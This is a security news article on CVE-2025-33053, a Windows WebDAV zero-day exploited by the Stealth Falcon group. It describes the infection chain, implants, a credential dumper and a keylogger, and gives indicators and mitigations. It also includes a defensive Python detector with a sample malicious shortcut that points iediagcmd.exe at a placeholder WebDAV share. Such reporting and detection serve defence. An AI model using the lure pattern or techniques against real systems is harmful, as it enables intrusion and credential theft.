Friday, June 27, 2025

Microsoft Windows WebDAV 0-Day RCE Vulnerability Actively Exploited in The Wild


A critical zero-day vulnerability in Microsoft Windows, designated CVE-2025-33053, has been actively exploited by the advanced persistent threat (APT) group Stealth Falcon.

The flaw, which enables remote code execution (RCE) through manipulation of a program's working directory, was addressed by Microsoft in its June 2025 Patch Tuesday updates following responsible disclosure by Check Point Research (CPR). Below is a technical breakdown of the attack and its implications.

Discovery and Exploitation of CVE-2025-33053

In March 2025, CPR identified an attempted cyberattack targeting a Turkish defense company.


The attack leveraged a malicious .url file, likely delivered via spear-phishing emails, to exploit CVE-2025-33053.

This vulnerability allows attackers to manipulate the working directory of legitimate Windows tools, such as iediagcmd.exe, so that they execute malicious files hosted on an attacker-controlled WebDAV server.

The .url file, named TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url, redirected the execution of iediagcmd.exe to a malicious route.exe on a WebDAV server (summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr).

By altering the working directory, the attacker ensured that Process.Start() resolved the malicious executable ahead of the legitimate system32 version.

This novel technique, a first for executable-based WebDAV attacks, underscores Stealth Falcon's innovative approach to exploiting system utilities.
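As an added illustration of the lure pattern described above (editor-supplied example code, not Check Point's or Microsoft's), the following Python helper parses Windows Internet Shortcut (.url) files and flags the combination seen here: a local executable as the shortcut target plus a WorkingDirectory that resolves to a WebDAV share. The sample shortcut, its host name and its file name are constructed placeholders, not the real indicators.

```python
"""Triage helper for Internet Shortcut (.url) files (added example, not vendor code).
Flags the CVE-2025-33053 lure pattern: a local LOLBin target whose WorkingDirectory
points at a WebDAV share served by the Windows WebClient mini-redirector."""
import configparser
import re

# WebDAV UNC forms the WebClient service recognises:
#   \\host@SSL@443\DavWWWRoot\...   \\host@80\share   \\host\DavWWWRoot\...
WEBDAV_HOST_RE = re.compile(r"^[^\\]+@(?:ssl(?:@\d+)?|\d+)$", re.I)
LOCAL_EXE_RE = re.compile(r"^(?:file:///)?[a-z]:[\\/].*\.(?:exe|com|scr)$", re.I)


def is_webdav_path(path: str) -> bool:
    """True for UNC paths that would be fetched over WebDAV rather than SMB."""
    p = path.strip().strip('"')
    if not p.startswith("\\\\"):
        return False
    host, _, rest = p[2:].partition("\\")
    return bool(WEBDAV_HOST_RE.match(host)) or rest.lower().startswith("davwwwroot")


def triage_url_file(name: str, content: str) -> list[str]:
    """Return findings for one .url file; an empty list means nothing suspicious."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str  # keep key case: URL, WorkingDirectory, IconFile
    cp.read_string(content)
    if "InternetShortcut" not in cp:
        return ["no [InternetShortcut] section"]
    sec = cp["InternetShortcut"]
    target, workdir, icon = sec.get("URL", ""), sec.get("WorkingDirectory", ""), sec.get("IconFile", "")
    findings = []
    if LOCAL_EXE_RE.match(target.strip()):
        findings.append(f"target is a local executable: {target}")
    if is_webdav_path(workdir):
        findings.append(f"WorkingDirectory is a WebDAV share: {workdir}")
    if is_webdav_path(icon):
        findings.append(f"IconFile is fetched from a WebDAV share: {icon}")
    if re.search(r"\.(?:pdf|docx?|xlsx?)\.url$", name, re.I):
        findings.append(f"double extension disguises shortcut as a document: {name}")
    return findings


# Constructed sample mimicking the reported lure; host and file name are placeholders.
SAMPLE_NAME = "damage_report.pdf.url"
SAMPLE_URL_FILE = r"""[InternetShortcut]
URL=file:///C:/Program Files/Internet Explorer/iediagcmd.exe
WorkingDirectory=\\webdav.example@SSL@443\DavWWWRoot\share
"""

if __name__ == "__main__":
    for finding in triage_url_file(SAMPLE_NAME, SAMPLE_URL_FILE):
        print("[!]", finding)
```

Run it over the .url files extracted from mail attachments or ZIP archives; any hit on the WorkingDirectory check is worth correlating with outbound WebDAV traffic from the same host.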

Stealth Falcon, also known as FruityArmor, has been active since at least 2012, targeting government and defense sectors in the Middle East and Africa, including Turkey, Qatar, Egypt, and Yemen.

According to the Check Point report, the group is known for acquiring zero-day exploits and deploying sophisticated, custom-built payloads.

Their latest campaign introduces the Horus Agent, a custom implant built on the open-source Mythic C2 framework, named after the Egyptian falcon-headed god.

Infection Chain

Infection chain (Source: Check Point)
  1. A phishing email delivers a malicious .url file, often inside a ZIP archive, disguised as a legitimate document.
  2. This file exploits CVE-2025-33053, manipulating iediagcmd.exe to run a malicious route.exe from a WebDAV server.
  3. The attack deploys Horus Loader, a C++-based loader protected by Code Virtualizer, which evades detection through anti-analysis techniques such as manual mapping of kernel32.dll and ntdll.dll and scanning for 109 antivirus processes from 17 vendors.
  4. It distracts victims by decrypting and displaying a decoy PDF, such as TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.
  5. The loader uses IPfuscation to decode a payload from IPv6 addresses, injecting it into msedge.exe using ZwAllocateVirtualMemory, ZwWriteVirtualMemory, and NtResumeThread.
  6. The Horus Agent, the final payload, employs custom OLLVM obfuscation with string encryption (shift cipher, -39) and control flow flattening, along with API hashing to resolve imports dynamically.
  7. It communicates with command-and-control servers via AES-encrypted HTTP requests, authenticated with HMAC-SHA256, using up to four domains and a killswitch date of December 31, 2099.
  8. Supported commands include system enumeration (survey) and stealthy shellcode injection (shinjectchunked).

The attack employs a multi-stage infection chain involving Spayload, a C++ Mythic implant with advanced capabilities.

Stealth Falcon's toolkit includes several undocumented tools for post-compromise operations.

The DC Credential Dumper targets the NTDS.dit, SAM, and SYSTEM files by accessing a virtual disk at C:\ProgramData\ds_notifier_0.vhdx using the DiscUtils library, then compressing the files into a ZIP archive named ds_notifier_2.vif for exfiltration.

The Passive Backdoor, usrprofscc.exe, is a C-based tool that operates as a service (UsrProfSCC) with admin privileges, listening for AES-encrypted shellcode payloads.

The Custom Keylogger, StatusReport.dll, injects into dxdiag.exe, logging keystrokes to an RC4-encrypted file at C:\Windows\Temp\~TN%LogName%.tmp.

Mitigation and Recommendations

Microsoft's patch for CVE-2025-33053 is now available, and organizations are urged to apply it immediately. CPR recommends:

  • Patching Systems: Update Windows to mitigate the WebDAV vulnerability.
  • Phishing Awareness: Train employees to recognize spear-phishing emails with suspicious attachments or links.
  • Network Monitoring: Watch for WebDAV-related traffic to domains such as summerartcamp[.]net or mystartupblog.com.
  • Endpoint Protection: Deploy solutions that detect LOLBin abuse and unauthorized process injection.

The exploitation of CVE-2025-33053 by Stealth Falcon highlights the group's technical sophistication and its focus on high-value targets in the Middle East.

By combining zero-day exploits, custom implants, and evasive techniques, the group poses a significant threat to regional security. Organizations should prioritize patching and proactive monitoring to counter this evolving threat.
